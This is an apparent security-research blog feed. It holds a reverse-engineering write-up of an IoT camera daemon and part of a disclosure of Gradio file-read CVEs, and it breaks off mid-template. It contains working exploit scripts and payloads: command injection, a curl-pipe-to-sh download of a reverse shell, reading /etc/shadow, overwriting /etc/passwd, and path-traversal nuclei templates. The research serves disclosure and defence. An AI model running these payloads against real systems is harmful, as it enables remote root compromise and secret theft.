❌

Normal view

There are new articles available, click to refresh the page.
Today β€” 14 June 2024Pentest/Red Team

Reverse Engineering The Unicorn

14 June 2024 at 16:10

While reversing a device, we stumbled across an interesting binary named unicorn. The binary appeared to be a developer utility potentially related to the Augentix SoC SDK. The unicorn binary is only executed when the device is set to developer mode. Fortunately, this was not the default setting on the device we were analyzing. However, we were interested in the consequences of a device that could have been misconfigured.

Discovering the Binary

While analyzing the firmware, we noticed that different services will start upon boot depending on what mode the device is set to.

...SNIPPET...

rcS() {
	# update system mode if a new one exists
	$MODE -u
	mode=$($MODE)
	echo "Current system mode: $mode"

	# Start all init scripts in /etc/init.d/MODE
	# executing them in numerical order.
	#
	for i in /etc/init.d/$mode/S??* ;do

		# Ignore dangling symlinks (if any).
		[ ! -f "$i" ] && continue
		case "$i" in
		*.sh)
		    # Source shell script for speed.
		    (
			trap - INT QUIT TSTP
			set start
			. $i
		    )
		    ;;
		*)
		    # No sh extension, so fork subprocess.
		    $i start
		    ;;
		esac
	done


...SNIPPET...

If the device boots in factory or developer mode, some additional remote services such as telnetd, sshd, and the unicorn daemon are started. The unicorn daemon listens on port 6666 and attempting to manually interact with the binary didn’t yield any interesting results. So we popped the binary into Ghidra to take a look at what was happening under the hood.

Reverse Engineering the Binary

From the main function we see that if the binary is run with no arguments, it will run as a daemon.

int main(int argc,char **argv)

{
  uint uVar1;
  int iVar2;
  ushort **ppuVar3;
  size_t sVar4;
  char *pcVar5;
  char local_8028 [16];
  
  memset(local_8028,0,0x8000);
  if (argc == 1) {
    openlog("unicorn",1,0x18);
    syslog(5,"unicorn daemon ready to serve!");
                    /* WARNING: Subroutine does not return */
    start_daemon_handle_client_conns();
  }
  while( true ) {
    while( true ) {
      while( true ) {
        iVar2 = getopt(argc,argv,"hsg:c:");
        uVar1 = optopt;
        if (iVar2 == -1) {
          openlog("unicorn",1,0x18);
          syslog(5,"2 unicorn daemon ready to serve!");
                    /* WARNING: Subroutine does not return */
          start_daemon_handle_client_conns();
        }
        if (iVar2 != 0x67) break;
        local_8028[0] = '{';
        local_8028[1] = '\"';
        local_8028[2] = 'm';
        local_8028[3] = 'o';
        local_8028[4] = 'd';
        local_8028[5] = 'u';
        local_8028[6] = 'l';
        local_8028[7] = 'e';
        local_8028[8] = '\"';
        local_8028[9] = ':';
        local_8028[10] = ' ';
        local_8028[11] = '\"';
        pcVar5 = stpcpy(local_8028 + 0xc,optarg);
        memcpy(pcVar5,"\"}",3);
        sVar4 = FUN_00012564(local_8028,0xffffffff);
        if (sVar4 == 0xffffffff) {
          syslog(6,"ccClientGet failed!\n");
        }
      }
      if (0x67 < iVar2) break;
      if (iVar2 == 0x3f) {
        if (optopt == 0x73 || (optopt & 0xfffffffb) == 99) {
          fprintf(stderr,"Option \'-%c\' requires an argument.\n",optopt);
        }
        else {
          ppuVar3 = __ctype_b_loc();
          if (((*ppuVar3)[uVar1] & 0x4000) == 0) {
            pcVar5 = "Unknown option character \'\\x%x.\n";
          }
          else {
            pcVar5 = "Unknown option \'-%c\'.\n";
          }
          fprintf(stderr,pcVar5,uVar1);
        }
        return 1;
      }
      if (iVar2 != 99) goto LAB_0000bb7c;
      sprintf(&DAT_0008c4c4,optarg);
    }
    if (iVar2 == 0x68) {
      USAGE();
                    /* WARNING: Subroutine does not return */
      exit(1);
    }
    if (iVar2 != 0x73) break;
    DAT_0008d410 = 1;
  }
LAB_0000bb7c:
  puts("aborting...");
                    /* WARNING: Subroutine does not return */
  abort();
}

If the argument passed is -h (0x68), then it calls the usage function:

void USAGE(void)

{
  puts("Usage:");
  puts("\t To run unicorn as daemon, do not use any args.");
  puts("\t\'-g get \'\t get product setting. D:img_pref");
  puts("\t\'-s set \'\t set product setting. D:img_pref");
  putchar(10);
  puts("\tSample usage");
  puts("\t$ unicorn -g img_pref");
  return;
}

When no arguments are passed, a function is called that sets up and handles client connections, which can be seen above renamed as start_daemon_handle_client_conns();. Most of the code in the start_daemon_handle_client_conns() function is handling and setting up client connections. There is a small portion of the code that performs an initial check of the data received to see if it matches a specific string AgtxCrossPlatCommn.

                  else {
                    ptr_result = strstr(DATA_FROM_CLIENT,"AgtxCrossPlatCommn");
                    syslog(6,"%s(): \'%s\'\n","interpretData",DATA_FROM_CLIENT);
                    if (ptr_result == (char *)0x0) {
                      syslog(6,"Invalid command \'%s\' received! Closing client fd %d\n",0,__fd_00);
                      goto LAB_0000e02c;
                    }
                    if ((DATA_FROM_CLIENT_PLUS1[command_length] != '@') ||
                       (client_command_buffer = (byte *)(ptr_result + 0x12),
                       client_command_buffer == (byte *)0x0)) goto LAB_0000e02c;
                    if (IS_SSL_ENABLED != 1) {
                      syslog(6,"Handle action for client %2d, fdmax = %d ...\n",__fd_00,uVar12);
                      command_length =
                           handle_client_cmd(client_command_buffer,client_info,command_length);
                      if (command_length != 0) {
                        send_response_to_client
                                  ((int)*client_info,apSStack_8520 + uVar9 * 5 + 2,command_length);
                      }
                      goto LAB_0000e02c;
                    }

The AgtxCrossPlatCommn portion of the code checks whether or not the data received ends with an @ character or if the data following AgtxCrossPlatCommn string is NULL. If the data doesn’t end with an @ character or the data following the key string is NULL it branches off. If these checks pass, the data is then sent to another function which handles the processing of the commands from the client. At this point we know that the binary expects to receive data in the format AgtxCrossPlatCommn<DATA>@. The handle_client_cmd function is where the fun happens. The beginning of the function handles some additional processing of the data received.

  if (client_command_buffer == (byte *)0x0) {
    syslog(6,"Invalid action: sig is NULL \n");
    return -3;
  }
  ACTION_NUM = get_Action_NUM(client_command_buffer);
  client_command = get_cmd_data(client_command_buffer,command_length);
  operation_result = ACTION_NUM;
  iVar1 = command_length;
  ptr_to_cmd = client_command;
  syslog(6,"%s(): action %d, nbytes %d, params %s\n","handleAction",ACTION_NUM,command_length,
         client_command);
  memset(system_command_buffer,0,0x100);
  switch(ACTION_NUM) {
  case 0:

The binary is expecting the data received to contain a number, which is parsed out and passed to a switch() statement to determine which action needs to be executed. There are a total of 15 actions which perform various tasks such as read files, write files, execute arbitrary commands (some intentional, others not), along with others whose purpose wasn’t not inherently clear. The first action number which caught our eye was 14 (0xe) as it appeared to directly allow us to run commands.

  case 0xe:
/* execute commands here
AgtxCrossPlatCommn14 sh -c 'curl 192.168.55.1/shell.sh | sh'@ */

    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    syslog(6,"ACT_cmd: |%s| \n",client_command);
    command_params = strstr(client_command,"rm ");
    if (command_params == (char *)0x0) {
      command_params = strstr(client_command,"audioctrl");
      if (((((((command_params != (char *)0x0) ||
              (command_params = strstr(client_command,"light_test"), command_params != (char *)0x0))
             || (command_params = strstr(client_command,"ir_cut.sh"), command_params != (char *)0x0)
             ) || ((command_params = strstr(client_command,"led.sh"), command_params != (char *)0x0
                   || (command_params = strstr(client_command,"sh"), command_params != (char *)0x0))
                  )) ||
           ((command_params = strstr(client_command,"touch"), command_params != (char *)0x0 ||
            ((command_params = strstr(client_command,"echo"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"find"), command_params != (char *)0x0)))))) ||
          (command_params = strstr(client_command,"iwconfig"), command_params != (char *)0x0)) ||
         (((((command_params = strstr(client_command,"ifconfig"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"killall"), command_params != (char *)0x0)) ||
            (command_params = strstr(client_command,"reboot"), command_params != (char *)0x0)) ||
           (((command_params = strstr(client_command,"mode"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"gpio_utils"), command_params != (char *)0x0))
            || ((command_params = strstr(client_command,"bp_utils"), command_params != (char *)0x0
                || ((command_params = strstr(client_command,"sync"), command_params != (char *)0x0
                    || (command_params = strstr(client_command,"chmod"),
                       command_params != (char *)0x0)))))))) ||
          ((command_params = strstr(client_command,"dos2unix"), command_params != (char *)0x0 ||
           (command_params = strstr(client_command,"mkdir"), command_params != (char *)0x0)))))) {
        syslog(6,"Command code: %d\n");
        system_command_status = run_system_cmd(client_command);
        goto LAB_0000b458;
      }
      system_command_result = -1;
    }
    else {
      system_command_result = -2;
    }
    syslog(3,"Invaild command code: %d\n",system_command_result);
    system_command_status = -1;
LAB_0000b458:
    send_response_to_client((int)*client_info,(SSL **)(client_info + 4),system_command_status);
    break;

To test, we manually started the unicorn binary and attempted to issue an ifconfig command with the payload AgtxCrossPlatCommn14ifconfig@ and the following python script:

import socket

HOST = "192.168.55.128" 
PORT = 6666  

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(b"AgtxCrossPlatCommn14ifconfig@")
    data = s.recv(1024)
    print("RX:", data.decode('utf-8'))
    s.close()

No data was written back to the socket, but on emulated device we saw that the command was executed:

/system/bin # ./unicorn 
eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56  
          inet addr:192.168.100.2  Bcast:192.168.100.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5849 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4680 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6133675 (5.8 MiB)  TX bytes:482775 (471.4 KiB)
          Interrupt:47 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Note that the difference in the IP is due to the device being emulated utilizing EMUX (https://emux.exploitlab.net/). One of the commands that is β€œallowed” per this case is sh, which means we can actually run any command on the system and not just ones listed. For example, the following payload could be used to download and execute a reverse shell on the device:

AgtxCrossPlatCommn14 sh -c 'curl 192.168.55.1/shell.sh | sh'@

Even if this case didn’t allow for the execution of sh, commands could still be chained together and executed with a payload like AgtxCrossPlatCommn14echo hello;id;ls -l@.

/system/bin # ./unicorn                                                                             
hello                                                                                               
uid=0(root) gid=0(root) groups=0(root),10(wheel)                                                    
-rwxr-xr-x    1 dbus     dbus          3774 Apr  9 20:33 actl
-rwxr-xr-x    1 dbus     dbus          2458 Apr  9 20:33 adc_read    
-rwxr-xr-x    1 dbus     dbus       1868721 Apr  9 20:33 av_main   
-rwxr-xr-x    1 dbus     dbus          5930 Apr  9 20:33 burn_in
-rwxr-xr-x    1 dbus     dbus        451901 Apr  9 20:33 cmdsender
-rwxr-xr-x    1 dbus     dbus         13166 Apr  9 20:33 cpu      
-rwxr-xr-x    1 dbus     dbus        162993 Apr  9 20:33 csr    
-rwxr-xr-x    1 dbus     dbus          9006 Apr  9 20:33 dbmonitor
-rwxr-xr-x    1 dbus     dbus         13065 Apr  9 20:33 ddr2pgm     
-rwxr-xr-x    1 dbus     dbus          2530 Apr  9 20:33 dump                  
-rwxr-xr-x    1 dbus     dbus          4909 Apr  9 20:33 dump_csr   
...SNIP...

We performed analysis of other areas of the unicorn executable and identified additional command injection and buffer overflow vulnerabilities. Case 2 is used to execute the cmdsender binary on the device, which appears to be a utility to control certain camera related aspects of the device.

  case 2:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    path_buffer[0] = '/';
    path_buffer[1] = 's';
    path_buffer[2] = 'y';
    path_buffer[3] = 's';
    path_buffer[4] = 't';
    path_buffer[5] = 'e';
    path_buffer[6] = 'm';
    path_buffer[7] = '/';
    path_buffer[8] = 'b';
    path_buffer[9] = 'i';
    path_buffer[10] = 'n';
    path_buffer[11] = '/';
    path_buffer[12] = 'c';
    path_buffer[13] = 'm';
    path_buffer[14] = 'd';
    path_buffer[15] = 's';
    path_buffer[16] = 'e';
    path_buffer[17] = 'n';
    path_buffer[18] = 'd';
    path_buffer[19] = 'e';
    path_buffer[20] = 'r';
    path_buffer[21] = ' ';
    path_buffer[22] = '\0';
    memset(large_buffer,0,0x7fe9);
    strcpy(path_buffer + 0x16,client_command);
    run_system_cmd(path_buffer);
    break;

Running the cmdsender binary on the device:

/system/bin # ./cmdsender -h        
[VPLAT] VB init fail.                                                                                                                                                                                    [VPLAT] UTRC init fail.                                                                                                                                                                                  [VPLAT] SR open shared memory fail.                                                                                                                                                                      [VPLAT] SENIF init fail.                                                                                                                                                                                 
[VPLAT] IS init fail.                            
[VPLAT] ISP init fail.                                                                              
[VPLAT] ENC init fail.                                                                                                                                                                                   
[VPLAT] OSD init fail.                                                                              
USAGE:                                                                                                                                                                                                   
        ./cmdsender [Option] [Parameter]                                                                                                                                                                 
                                                                                                                                                                                                         
OPTION:                                           
        '--roi dev_idx path_idx luma_roi.sx luma_roi.sy luma_roi.ex luma_roi.ey awb_roi.sx awb_roi.sy awb_roi.ex awb_roi.ey' Set ROI attributes
        '--pta dev_idx path_idx mode brightness_value contrast_value break_point_value pta_auto.tone[0 ~ MPI_ISO_LUT_ENTRY_NUM-1] pta_manual.curve[0 ~ MPI_PTA_CURVE_ENTRY_NUM-1]' Set PTA attributes
                                                                                                    
        '--dcc dev_idx path_idx gain0 offset0 gain1 offset1 gain2 offset2 gain3 offset3' Set DCC attributes
                                                                                                    
        '--dip dev_idx path_idx is_dip_en is_ae_en is_iso_en is_awb_en is_csm_en is_te_en is_pta_en is_nr_en is_shp_en is_gamma_en is_dpc_en is_dms_en is_me_en' Set DIP attributes
                                                                                                    
        '--lsc dev_idx path_idx origin x_trend_2s y_trend_2s x_curvature y_curvature tilt_2s' Set LSC attributes
                                                                                                                                                                                                                 '--gamma dev_idx path_idx mode' Set GAMMA attributes                                                                                                                                             
                                                                                                    
        '--ae dev_idx path_idx sys_gain_range.min sys_gain_range.max sensor_gain_range.min sensor_gain_range.max isp_gain_range.min isp_gain_range.max frame_rate slow_frame_rate speed black_speed_bias 
interval brightness tolerance gain_thr_up gain_thr_down 
              strategy.mode strategy.strength roi.luma_weight roi.awb_weight delay.black_delay_frame delay.white_delay_frame anti_flicker.enable anti_flicker.frequency anti_flicker.luma_delta fps_mode 
manual.is_valid manual.enable.bit.exp_value manual.enable.bit.inttime
              manual.enable.bit.sensor_gain manual.enable.bit.isp_gain manual.enable.bit.sys_gain manual.exp_value manual.inttime manual.sensor_gain manual.isp_gain manual.sys_gain' Set AE attributes

        '--iso dev_idx path_idx mode iso_auto.effective_iso[0 ~ MPI_ISO_LUT_ENTRY_NUM-1] iso_manual.effective_iso' Set iso attributes

        '--dbc dev_idx path_idx mode dbc_level' Set DBC attributes

The arguments that are intended to be used with the cmdsender command are received and copied directly to the cmdsender path, which is then passed run_system_cmd, which simply runs system() on the given argument. The payload AgtxCrossPlatCommn2 ; id @ causes the id command to be run on the device:

/system/bin # ./unicorn 
[VPLAT] VB init fail.
[VPLAT] UTRC init fail.
[VPLAT] SR open shared memory fail.
[VPLAT] SENIF init fail.
[VPLAT] IS init fail.
[VPLAT] ISP init fail.
[VPLAT] ENC init fail.
[VPLAT] OSD init fail.
executeCmd(): Unknown command item
item: 920495836, direction: 1
printCmd(): Unknown command item
uid=0(root) gid=0(root) groups=0(root),10(wheel)

Case 4 handles sending files from the device to the connecting client, for example to get /etc/shadow from the device, the payload AgtxCrossPlatCommn4/etc/shadow@ can be used.

python3 case_4.py 
b'root:$1$3hkdVSSD$iPawbqSvi5uhb7JIjY.MK0:10933:0:99999:7:::\ndaemon:*:10933:0:99999:7:::\nbin:*:10933:0:99999:7:::\nsys:*:10933:0:99999:7:::\nsync:*:10933:0:99999:7:::\nmail:*:10933:0:99999:7:::\nwww-data:*:10933:0:99999:7:::\noperator:*:10933:0:99999:7:::\nnobody:*:10933:0:99999:7:::\ndbus:*:::::::\nsshd:*:::::::\nsystemd-bus-proxy:*:::::::\nsystemd-journal-gateway:*:::::::\nsystemd-journal-remote:*:::::::\nsystemd-journal-upload:*:::::::\nsystemd-timesync:*:::::::\n'

Case 5 appears to be for receiving files from a client and is also vulnerable to command injection. Although in this instance spaces break execution, which limits what can be run.

  case 5:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    file_size = parse_file_size((byte *)client_command);
    string_length = strlen(client_command);
    filename = get_cmd_data((byte *)client_command,string_length);
    syslog(6,"fSize = %lu\n",file_size);
    syslog(6,"fPath = \'%s\'\n",filename);
    sprintf(system_command_buffer,"%lu",file_size);
    syslog(6,"ret_value: %s\n",system_command_buffer);
    string_length = strlen(system_command_buffer);
    send_data_to_client((int *)client_info,system_command_buffer,string_length);
    operation_result = recieve_file((int)*client_info,(char *)filename,file_size);
    send_response_to_client((int)*client_info,(SSL **)(client_info + 4),operation_result);
    break;

The format of this command is:

AgtxCrossPlatCommn5<FILE> <NUM-BYTES>@

<FILE> is the name of the file to write and <NUM-BYTES> is the number of bytes that will be sent in the subsequent client transmit. The parse_file_size() function looks for the space and attempts to read the following characters as the number of bytes that will be sent. A command with no spaces, such as the id command, can be injected into the <FILE> portion:

AgtxCrossPlatCommn5test.txt;id #@

# Output from device
/system/bin # ./unicorn 
dos2unix: can't open 'test.txt': No such file or directory
uid=0(root) gid=0(root) groups=0(root),10(wheel)
^C

/system/bin # ls -l test.*
----------    1 root     root             0 Apr 18  2024 test.txt;id

This case can also be used to overwrite files. The follow POC changes the first line in /etc/passwd:

import socket

HOST = "192.168.55.128" 
PORT = 6666 

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(b"AgtxCrossPlatCommn5/etc/passwd 29@")
    print(s.recv(1024))
    s.sendall(b"haxd:x:0:0:root:/root:/bin/sh")
    print(s.recv(1024))
    s.close()
/system/bin # cat /etc/passwd
haxd:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
sshd:x:1001:1001:SSH drop priv user:/:/bin/false
systemd-bus-proxy:x:1002:1004:Proxy D-Bus messages to/from a bus:/:/bin/false
systemd-journal-gateway:x:1003:1005:Journal Gateway:/var/log/journal:/bin/false
systemd-journal-remote:x:1004:1006:Journal Remote:/var/log/journal/remote:/bin/false
systemd-journal-upload:x:1005:1007:Journal Upload:/:/bin/false
systemd-timesync:x:1006:1008:Network Time Synchronization:/:/bin/false

Case 8 contains a command injection vulnerability. It is used to run the fw_setenv command, but takes user input as an argument and builds the command string which gets passed directly to a system() call.

  case 8:
  /* command injection here
    AgtxCrossPlatCommn8 ; touch /tmp/fw-setenv-cmdinj.txt # @ */
    
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    if (*client_command == '\0') {
      command_params = "fw_setenv --script /system/partition";
    }
    else {
      operation_result = FUN_0000ccd8(client_command);
      if (operation_result != 1) {
        operation_result = FUN_0000da18((int *)client_info,client_command);
        if (operation_result != -1) {
          return 0;
        }
        operation_result = -1;
        goto LAB_0000b63c;
      }
      sprintf(system_command_buffer,"fw_setenv %s",client_command);
      command_params = system_command_buffer;
    }
    system_command_status = run_system_cmd(command_params);
    goto LAB_0000b458;

The payload AgtxCrossPlatCommn8;id @ will cause the id command to be executed.

Case 13 contains a buffer overflow vulnerability. The use case case runs cat on a user provided file. If the filename or path is too long, it causes a buffer overflow.

  case 0xd:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    syslog(6,"ACT_cat: |%s| \n",client_command);
    operation_result = execute_cat_cmd((int *)client_info,client_command);
    if (operation_result != -1) {
      return 0;
    }
LAB_0000b63c:
    sprintf(system_command_buffer,"%d",operation_result);
    string_length = strlen(system_command_buffer);
    send_data_to_client((int *)client_info,system_command_buffer,string_length);
    break;
int execute_cat_cmd(int *socket_info,char *file_path)

{
  size_t result_length;
  char cat_command [128];
  char cat_result [256];
  
  memset(cat_result,0,0x100);
  memset(cat_command,0,0x80);
                    /* Buffer overflow here when file_path > 128
                        */
  sprintf(cat_command,"cat %s",file_path);
  FUN_0000cdc4(cat_command,cat_result);
  result_length = strlen(cat_result);
  send_data_to_client(socket_info,cat_result,result_length);
  return 0;
}

Sending a large amount of A’s causes a segfault showing several registers, including the program counter, and the stack are overwritten with A’s. The payload AgtxCrossPlatCommn13 AAAAAAAAAAAAAA…snipped… @ will cause a crash.

Program received signal SIGSEGV, Segmentation fault.
0x41414140 in ?? ()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$r0  : 0x0       
$r1  : 0x7efe7188  β†’  0x4100312d ("-1"?)
$r2  : 0x2       
$r3  : 0x0       
$r4  : 0x41414141 ("AAAA"?)
$r5  : 0x41414141 ("AAAA"?)
$r6  : 0x13a0    
$r7  : 0x7efef628  β†’  0x00000005
$r8  : 0x7efefaea  β†’  "   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r9  : 0x0008d40c  β†’  0x00000000
$r10 : 0x13a0    
$r11 : 0x41414141 ("AAAA"?)
$r12 : 0x0       
$sp  : 0x7efe7298  β†’  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$lr  : 0x00012de4  β†’  0xe1a04000
$pc  : 0x41414140 ("@AAA"?)
$cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x7efe7298β”‚+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"    ← $sp
0x7efe729cβ”‚+0x0004: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a0β”‚+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a4β”‚+0x000c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a8β”‚+0x0010: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72acβ”‚+0x0014: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72b0β”‚+0x0018: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72b4β”‚+0x001c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:THUMB ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414140
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "unicorn", stopped 0x41414140 in ?? (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────

The research shows that a misconfiguration in firmware can lead to multiple code execution paths and reducing the remote attack surfaces, especially from developer tools, can greatly reduce the risk to an IoT device. We recommend that manufactures of devices verify that the unicorn binary is not running or enabled as a service. This would mitigate all of the code execution paths described above. If you have any devices utilizing Augentix SoCs that have this binary, we’d love to hear about it.

Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces

14 June 2024 at 13:05

On Friday, May 31, the AI company Hugging Face disclosed a potential breach where attackers may have gained unauthorized access to secrets stored in their Spaces platform.

This reminded us of a couple of high severity vulnerabilities we disclosed to Hugging Face affecting their Gradio framework last December. When we reported these vulnerabilities, we demonstrated that they could lead to the exfiltration of secrets stored in Spaces.

Hugging Face responded in a timely way to our reports and patched Gradio. However, to our surprise, even though these vulnerabilities have long been patched, these old vulnerabilities were, up until recently, still exploitable on the Spaces platform for apps running with an outdated Gradio version.

This post walks through the vulnerabilities we disclosed and their impact, and our recent effort to work with Hugging Face to harden the Spaces platform after the reported potential breach. We recommend all users of Gradio upgrade to the latest version, whether they are using Gradio in a Hugging Face Space or self-hosting.

Background

Gradio is a popular open-source Python-based web application framework for developing and sharing AI/ML demos. The framework consists of a backend server that hosts a standard set of REST APIs and a library of front-end components that users can plug in to develop their apps. A number of popular AI apps use Gradio such as the Stable Diffusion Web UI and Text Generation Web UI.

Users have several options for sharing Gradio apps: hosting it in a Hugging Face Space; self-hosting; or using the Gradio share feature, which exposes their machine to the Internet using a Gradio-provided proxy URL similar to ngrok.

A Hugging Face Space provides the foundation for hosting an app using Hugging Face’s infrastructure, which runs on Kubernetes. Users use Git to manage their source code and a Space to build, deploy, and host their app. Gradio is not the only way to develop apps – the Spaces platform also supports apps developed using Streamlit. Docker, or static HTML.

Within a Space, users can define secrets, such as Hugging Face tokens or API keys, that can be used by their app. These secrets are accessible to the application as environment variables. This method for secret storage is a step up from storing secrets in source code.

File Read Vulnerabilities in Gradio

Last December we disclosed to Hugging Face a couple of high severity vulnerabilities, CVE-2023-51449 and CVE-2024-1561, that allow attackers to read arbitrary files from a server hosting Gradio, regardless of whether it was self-hosted, shared using the share feature, or hosted in a Hugging Face space. In a Hugging Face space, it was possible for attackers to exploit these vulnerabilities to access secrets stored in environment variables by reading the /proc/self/environ pseudo-file.

CVE-2023-51449

CVE-2023-51449, which affects Gradio versions 4.0 – 4.10, is a path traversal vulnerability in the file endpoint. This endpoint is supposed to only serve files stored within a Gradio temporary directory. However we found that the check for making sure a requested file was contained within the temporary directory was flawed.

The check on line 935 to prevent path traversal doesn’t account for subdirectories inside the temp folder. We found that we could use the upload endpoint to first create a subdirectory within the temp directory, and then traverse out from that subdirectory to read arbitrary files using the ../ or %2e%2e%2f sequence.

To read environment variables, one can request the /proc/self/environ pseudo-file using a HTTP Range header:

Interestingly, CVE-2023-51449 was introduced in version 4.0 as part of a refactor and appears to be a regression of a prior vulnerability CVE-2023-34239. This same exploit was tested to work against Gradio versions prior to 3.33.

Detection

Below is a nuclei template for testing this vulnerability:


id: CVE-2023-51449
info:
  name: CVE-2023-51449
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
  reference:
    - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-51449
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311

        -----------------------------250033711231076532771336998311
        Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
        Content-Type: application/octet-stream

        a
        -----------------------------250033711231076532771336998311--

      - |
        GET /file={{download_path}}{{path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\\[\"(.+)okmijnuhbygv\"\\]"

    payloads:
      path:
        - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
        - ../../../../../../../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

Timeline

  • Dec. 17, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 18, 2023: Hugging Face acknowledges report
  • Dec. 20, 2023: GitHub advisory published. Issue fixed in Gradio 4.11. (Note Gradio used this advisory to cover two separate findings, one for the LFI we reported and another for a SSRF reported by another researcher)
  • Dec. 22, 2023: CVE published
  • Dec. 24, 2023: Hugging Face confirms fix over email with commit https://github.com/gradio-app/gradio/issues/6816

CVE-2024-1561

CVE-2024-1561 arises from an input validation flaw in the component_server API endpoint that allows attackers to invoke internal Python backend functions. Depending on the Gradio version, this can lead to reading arbitrary files and accessing arbitrary internal endpoints (full-read SSRF). This affects Gradio versions 3.47 to 4.12. This is notable because the last version of Gradio 3 is 3.50.2, and a number of users haven’t made the transition yet to Gradio 4 because of the major refactor between versions 3 and 4. The vulnerable code:

On line 702, an arbitrary user-specified function is invoked against the specified component object.

For Gradio versions 4.3 – 4.12, the move_resource_to_block_cache function is defined in the base class of all Component classes. This function copies arbitrary files into the Gradio temp folder, making them available for attackers to download using the file endpoint. Just like CVE-2023-51449, this vulnerability can also be used to grab the /proc/self/environ pseudo-file containing environment variables.

In Gradio versions 3.47 – 3.50.2, a similar function called make_temp_copy_if_needed can be invoked on most Component objects.

In addition, in Gradio versions 3.47 to 3.50.2 another function called download_temp_copy_if_needed can be invoked to read the contents of arbitrary HTTP endpoints and store the results into the temp folder for retrieval, resulting in a full-read SSRF.

There are other component-specific functions that can be invoked across different Gradio versions, and their effects vary per component.

Detection

The following nuclei templates can be used to test for CVE-2024-1561.

File read against Gradio 4.3-4.12:


id: CVE-2024-1561-4x
info:
  name: CVE-2024-1561-4x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this template works for Gradio versions 4.3-4.12
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
